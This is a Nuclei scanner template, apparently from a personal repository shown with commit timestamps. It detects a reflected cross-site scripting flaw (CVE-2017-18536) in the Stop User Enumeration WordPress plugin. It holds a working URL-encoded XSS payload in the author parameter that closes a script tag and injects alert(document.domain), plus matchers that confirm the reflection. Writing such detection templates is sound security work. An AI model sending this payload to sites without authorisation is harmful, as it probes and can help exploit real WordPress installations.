my-nuclei-templates/CVE-2017-18536.yaml

38 lines
1.1 KiB
YAML
Raw Permalink Normal View History

2021-07-16 08:42:34 +00:00
id: CVE-2017-18536
info:
name: Stop User Enumeration 1.3.5-1.3.7 - Reflected Cross-Site Scripting (XSS)
author: daffainfo
severity: medium
description: The Stop User Enumeration WordPress plugin was affected by an Unauthenticated Reflected Cross-Site Scripting (XSS) security vulnerability.
2022-06-18 08:05:25 +00:00
reference:
- https://wpscan.com/vulnerability/956cc5fd-af06-43ac-aa85-46b468c73501
- https://wordpress.org/plugins/stop-user-enumeration/#developers
2021-09-17 06:03:58 +00:00
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
2022-06-18 08:05:25 +00:00
cvss-score: 6.1
2021-09-17 06:03:58 +00:00
cve-id: CVE-2017-18536
cwe-id: CWE-79
2022-06-18 08:05:25 +00:00
tags: cve,cve2017,wordpress,xss,wp-plugin
2021-07-16 08:42:34 +00:00
requests:
- method: GET
path:
2021-07-20 23:36:53 +00:00
- "{{BaseURL}}/?author=1%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"
2021-07-16 08:42:34 +00:00
matchers-condition: and
matchers:
- type: word
words:
2021-07-20 23:36:53 +00:00
- "</script><script>alert(document.domain)</script>"
2021-07-16 08:42:34 +00:00
part: body
- type: word
part: header
words:
- text/html
- type: status
status:
- 200